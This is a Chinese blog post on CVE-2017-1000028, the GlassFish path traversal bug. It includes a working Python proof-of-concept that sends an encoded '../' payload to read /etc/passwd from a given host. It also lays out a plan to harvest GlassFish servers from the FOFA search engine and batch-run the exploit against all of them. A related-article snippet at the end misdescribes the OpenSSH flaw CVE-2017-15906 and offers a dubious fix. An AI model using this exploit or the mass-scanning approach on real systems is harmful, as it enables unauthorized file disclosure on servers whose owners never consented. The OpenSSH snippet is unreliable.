自动化漏洞挖掘(CVE-2017-1000028)

已于 2023-08-04 12:01:17 修改
阅读量1k 收藏 5
点赞数
分类专栏: web漏洞 文章标签: 自动化 安全 web安全
于 2023-01-26 14:57:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45626840/article/details/128764630
版权

文章目录

前言

一些PoC简单,或者说验证方式简单的漏洞,可以通过脚本进行自动化地挖掘。像RCE、目录穿越这样的漏洞,可能发送一个GET型的HTTP请求,通过响应包的回显信息就可以验证漏洞是否存在。
不错的参考资料:

  1. https://mp.weixin.qq.com/s/VdBj7ImJ6-RDDvSstvmIBQ
  2. https://www.bilibili.com/video/BV1JZ4y1c7ro?p=76&vd_source=beeb967a84b38ad9b59e7206ed42a531

一、glassfish 任意文件读取(CVE-2017-1000028)

关于漏洞的介绍、复现:

  1. https://blog.csdn.net/weixin_44033675/article/details/121316067
  2. https://www.secpulse.com/archives/4276.html

我们在Web系统中讲过,Web服务器向客户端提供静态内容的方式→读取一个磁盘文件,通过HTTP协议返回给客户端。

在处理GET请求时,我直接取path,然后使用open函数(文件打开函数)打开path对应的静态文件,并通过HTTP响应文件的内容。这里出现了一个明显的目录遍历漏洞,对path未做任何判断和过滤。
当我请求http://localhost/etc/passwd时,self.path对应的值是/etc/passwd,而open(‘/etc/passwd’),自然可以读取到passwd文件。

那攻击者为什么要构造/…/…/…/…/…/…/etc/passwd呢? 这是为了防止程序过滤或丢失最左侧的/符号,让起始目录变成脚本当前所在的目录。
攻击者使用多个…符号,不断向上跳转,最终到达根/,而根/的父目录就 是自己,因此使用再多的…都无差别,最终停留在根/的位置,如此,便可通过绝对路径去读取任意文件。

二、编写POC

既然复现了漏洞,那么就可以编写POC啦

import requests
import argparse
'''
思路:
 1、接收url
 2、拼接payload
 3、发送HTTP数据包
 4、根据回显(这里简单使用状态码)判断是否存在漏洞
分解为2个函数:
 1、命令行参数处理函数
 2、漏洞验证函数
'''
# 命令行参数处理
def commandLine():
    parser = argparse.ArgumentParser(description="CVE-2017-1000028")
    parser.add_argument('-H',dest='host',required=True,help='Target host')
    parser.add_argument('-p',dest='port',required=True,help='Target port')
    args = parser.parse_args()
    return args

# 漏洞验证函数
def poc(args):
    headers={'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36 Edg/80.0.361.54'}
    payload = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
    poc_url = args.host + ':' + args.port + payload
    #print(poc_url)

    try:
        resp = requests.get(poc_url,headers=headers,verify=False)
        if resp.status_code == 200:
            print("[+]cve-2017-1000018 exist")
        else:
            print("[+]cve-2017-1000018 not exist")
    except Exception as e:
        print(e)
if __name__ == '__main__':
    args = commandLine()
    poc(args)

在这里插入图片描述

三、批量自动化挖掘

1、要想批量刷漏洞,首先得有大批可能含有漏洞的url ----> fofa搜索
2、利用poc脚本遍历这些url

fofa采集url

fofa中搜索"glassfish" && port="4848",观察它的请求url为
https://fofa.info/result?qbase64=ImdsYXNzZmlzaCIgJiYgcG9ydD0iNDg0OCI%3D
base64解码后
在这里插入图片描述
知道请求url的结构后,可以开始爬虫编写啦。这里可能需要一些爬虫和数据处理的知识,

  1. https://www.bilibili.com/video/BV14L4y1N7F9?p=49&vd_source=beeb967a84b38ad9b59e7206ed42a531
  2. https://doc.itprojects.cn/0001.zhishi/python.0013.spiderbase/index.html#/38
'''
思路:
 1、爬取页面内容
 2、提取其中的url并存到一个文件中
'''
藤原千花的败北
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现 Oracle GlassFish Server 任意文件读取漏洞(CVE-2017-1000028
nnn2188185的博客
04-16 1055
Oracle GlassFish Server Open Source Edition 4.1版本中存在任意文件读取漏洞。攻击者可借助特制的HTTP GET请求利用该漏洞访问敏感数据。 CVE-2017-1000028 CNNVD-201707-831 CNVD-2017-27302
java glassfish漏洞_CVE-2017-1000028 Oracle GlassFish Server Open Source Edition 路径遍历漏洞-漏洞情报、漏洞详情、安全漏洞、...
weixin_28836507的博客
03-04 861
# Exploit title: Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)# Author: Dhiraj Mishra# Date: 2018-08-14# Software: Oracle Glassfish Server OSE# Version: 4.1# Software link: http://download.or...
知识科普之自动化漏洞挖掘技术
Moyun_vackbot的博客
05-30 2432
自动化漏洞挖掘技术,也被称之为fuzzing技术,是一种基于黑盒(或灰盒)的测试技术,它通过自动化生成并执行大量的随机测试用例来发现产品或协议中存在的未知漏洞。Fuzzing技术已成为软件测试、漏洞挖掘领域最有效的手段之一,特别适合用于发现0day漏洞,是众多黑客或黑帽子发现软件漏洞的首选技术。
自动化漏洞挖掘工具,集合Nuclei + Subfinder + Gau + Paramspider + httpx
最新发布
leah126的博客
05-18 1140
NucleiScanner是一个强大的自动化工具,用于检测Web应用程序中的未知漏洞。是一个自动化工具,它结合了NucleiSubfinderGau和httpx功能,以增强Web应用程序安全测试。它使用Subfinder来收集子域,Gau通过过滤不需要的扩展来收集URL,用于识别潜在的入口点,用于扫描漏洞。简化了流程,使安全专业人员和Web开发人员更容易有效地检测和解决安全风险。下载以保护您的Web应用程序免受漏洞和攻击。NucleiSubfinderGauhttpx重要提示:请确保工具Nuclei。
自动化漏洞挖掘
Askshhbs的博客
04-25 476
网络安全web,Kali,渗透测试相关课件,工具,资料 可以关注公众号:“掌控安全课堂” 回复:“我想学黑客”即可免费获得 1.记得有段时间刷抖音遇见一个大师,那天开始,我悟了。谁曾想左脚踩右脚可以螺旋直接升天? 记得今年不知道几月份,火线平台放开了,但由于工作原因一直征战于召唤师峡谷,实属是太忙,上周聊胜于无的我打开了百度,发现居然“充钱了”,ok,进入一看原先刚注册时只有点点资产,现在已有许多,于是便有了捡漏洞的想法。。 2.Huoxian爬虫+httpscan筛选+Auto_man自动化
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 349
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
漏洞挖掘】Xray+rad自动化批量漏洞挖掘
信安是不可或缺的一部分!
07-31 2685
自动化漏洞挖掘是指利用计算机程序和工具来扫描、分析和检测应用程序、网络和系统中的安全漏洞的过程。这种方法可以帮助安全专家和研究人员更高效地发现和修复潜在的安全威胁,从而提高整体系统的安全性。注意:一切未授权挖掘属于违法行为提示:以下是本篇文章正文内容,下面案例可供参考更多使用可以查看:https://docs.xray.cool/#/tutorial/introduce我的推荐使用awvs联动xary可以全面的做漏洞扫描。
【技术分享】v8漏洞学习之cve-2020-16040 .pdf
09-05
【技术分享】V8漏洞学习之CVE-2020-16040涉及到的是JavaScript引擎V8的一个安全漏洞,这个漏洞与数据处理和类型转换有关,可能导致潜在的安全风险。V8是Google Chrome浏览器的核心组件,负责解析和执行JavaScript...
信息安全_数据安全_How CVE-2018-8611 can be exploit.pdf
08-22
信息安全_数据安全_How CVE-2018-8611 can be exploit 风控 业务安全 安全现状 自动化 安全建设
国内SRC漏洞挖掘技巧与经验分享
01-29
同时,利用漏洞扫描工具,如Nessus、OpenVAS等,进行自动化检测。对于未知漏洞,需要运用逆向工程、Fuzzing等技术进行深入分析。 3. **代码审计**:对于开源软件,直接审查源代码是发现漏洞的有效方法。通过静态...
基于Cloud Kernel龙蜥操作系统,并对其进行自动化缺陷检测、漏洞挖掘和修复,以提升其安全性和可靠性
11-15
本文将深入探讨基于Cloud Kernel龙蜥操作系统进行自动化缺陷检测、漏洞挖掘和修复的技术方法,以提升其安全性和可靠性。 一、自动化缺陷检测 1. 静态代码分析:通过对源代码进行无执行的检查,发现潜在的编程错误...
浏览器地址栏欺骗漏洞挖掘.pdf
01-02
- **浏览器本身的UI控件**:攻击者可以通过自定义的下拉菜单(如CVE-2016-2822)或表单验证气泡(如CVE-2017-5016, CVE-2017-5065, CVE-2017-5079, CVE-2017-5083)来创建视觉上的误导,伪装成合法界面。...
漏洞自动挖掘技术
Home Of HappyBear
01-09 2780
漏洞发掘技术主要包括:1黑盒自动测试2静态自动分析3补丁比较4动态调试污点检查 在这个领域,人的经验还是最重要的A适当的漏洞数据源--〉B知识发现或者数据挖掘--〉C漏洞预测模型--〉D漏洞自动发掘模型 A漏洞样本一定要合适C漏洞的共性,软件的什莫部分最有可能存在漏洞?软件在什莫情况下最有可能触发漏洞? 下面逐个分析 1黑盒自动测试无法真正理解程序的流程可否借鉴一些软件行为学的东西?模拟非正常的软
面向人工智能的自动化安全检测与漏洞挖掘
禅与计算机程序设计艺术
07-05 5531
作者:禅与计算机程序设计艺术 《面向人工智能的自动化安全检测与漏洞挖掘》 1. 引言 1.1. 背景介绍 随着人工智能技术的快速发展,各种网络安全威胁也随之而来。为了保障国家的网络安全,人工智能安全检测与漏洞挖掘技术应运而生。人工智能安全检测与漏洞挖掘技术,可以通过对网络、
CVE漏洞挖掘学习记录
caiyuu的博客
11-10 4198
CVE漏洞挖掘学习笔记空闲扫描利用空闲扫描进行信息收集工作原理Nmap探测waf的脚本waf介绍探测waf工作原理 空闲扫描 空闲扫描时一种允许端口完全欺骗的扫描方式。使得攻击者不使用自己的IP向目标主机发送数据包,利用具有可预测的IP ID序列号来掩盖端口扫描的原始IP(隐藏IP)。如利用不活跃的“僵尸主机“反弹给”攻击者一个旁通信道。 利用空闲扫描进行信息收集 前提准备,需要一个僵尸主机; nmap -p80 --script ipidseq <your ip>/24 <全网段&
Jsonp漏洞简析及自动化漏洞挖掘脚本编写
mingyqf的博客
10-29 567
Jsonp漏洞被广泛的应用到渗透测试的信息搜集环节,攻击者在搞定一个站点之后,可以通过xss等形式插入jsonp漏洞利用代码,从而获取到浏览网站的用户的私人信息,本篇文章重点对jsonp漏洞利用原理进行阐述并提供一种jsonp漏洞自动化挖掘脚本的编写思路。 Jsonp跨域原理解析 为什么要跨域 为了用户的信息安全,浏览器在很早以前就引用了同源策略,同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。如果两个页面的协议,端口和域名都相同,则两个页面具有相同的源..
如何挖掘Apache2中的CVE-2021-41773漏洞
HBohan的博客
12-06 3275
根据Apache官方发布的安全公告,Apache HTTP Server中存在一个路径穿越漏洞,漏洞编号为CVE-2021-41773。A
Wfuzz:功能强大的web漏洞挖掘工具
zhaoweiqi23333的博客
01-15 1624
在靶场复现PRIME:1发表后,小伙伴们发现wfuzz这个工具好强大,都想听小智聊聊它,今天这就来啦,都带好小板凳哦~
漏洞挖掘技术综述与人工智能应用探索:从静态分析到深度学习,跨项目挑战与未来机遇_机器学习与人工智能算法在超深基坑监测中的应用
m0_60666921的博客
04-07 982
然而,仅依赖词频统计和N-gram模型在漏洞挖掘时存在局限性,由于其无法深入理解和建模代码的复杂语义关系,可能导致过度简化了源代码的内在逻辑,同时引入大量噪声数据,降低了漏洞检测模型的有效性和准确性。因此,通过研究和借鉴已知漏洞模式以及成功的漏洞挖掘技术,在一个项目上建立的有效漏洞挖掘模型有望应用于另一个具有相似或相关特征的项目上,从而提高安全性评估和漏洞发现的效率。此外,不同粒度级别的检测对于精准定位漏洞位置至关重要,细粒度的漏洞挖掘模型需具备识别具体代码片段的能力,这对模型的设计提出了更高的要求。
如何修复 OpenSSH 安全漏洞(CVE-2017-15906)
06-01
OpenSSH 安全漏洞(CVE-2017-15906)是一种影响 OpenSSH 7.4 到 7.6 版本的漏洞,攻击者可以利用该漏洞绕过身份验证并执行任意代码。以下是修复该漏洞的步骤: 1. 升级 OpenSSH 如果您的系统使用的是受影响的 OpenSSH 版本,建议立即升级到最新版本。可以通过以下命令检查您的 OpenSSH 版本: ``` ssh -V ``` 如果版本号在 7.4 到 7.6 之间,则说明您的系统受到影响。您可以前往 OpenSSH 官网下载最新版本并安装,或者使用系统自带的包管理器进行更新。 2. 禁用 UsePrivilegeSeparation 选项 如果您无法立即升级 OpenSSH,可以通过禁用 UsePrivilegeSeparation 选项来暂时修复该漏洞。可以通过以下命令来禁用该选项: ``` echo "UsePrivilegeSeparation no" >> /etc/ssh/sshd_config ``` 或者编辑 /etc/ssh/sshd_config 文件,在文件中添加以下内容: ``` UsePrivilegeSeparation no ``` 然后重新启动 sshd 服务: ``` systemctl restart sshd ``` 禁用 UsePrivilegeSeparation 选项可以防止攻击者利用该漏洞绕过身份验证,但无法防止执行任意代码攻击。 总的来说,为保护系统安全,建议您尽快升级 OpenSSH 或禁用 UsePrivilegeSeparation 选项,以防止被攻击者利用 CVE-2017-15906 漏洞攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值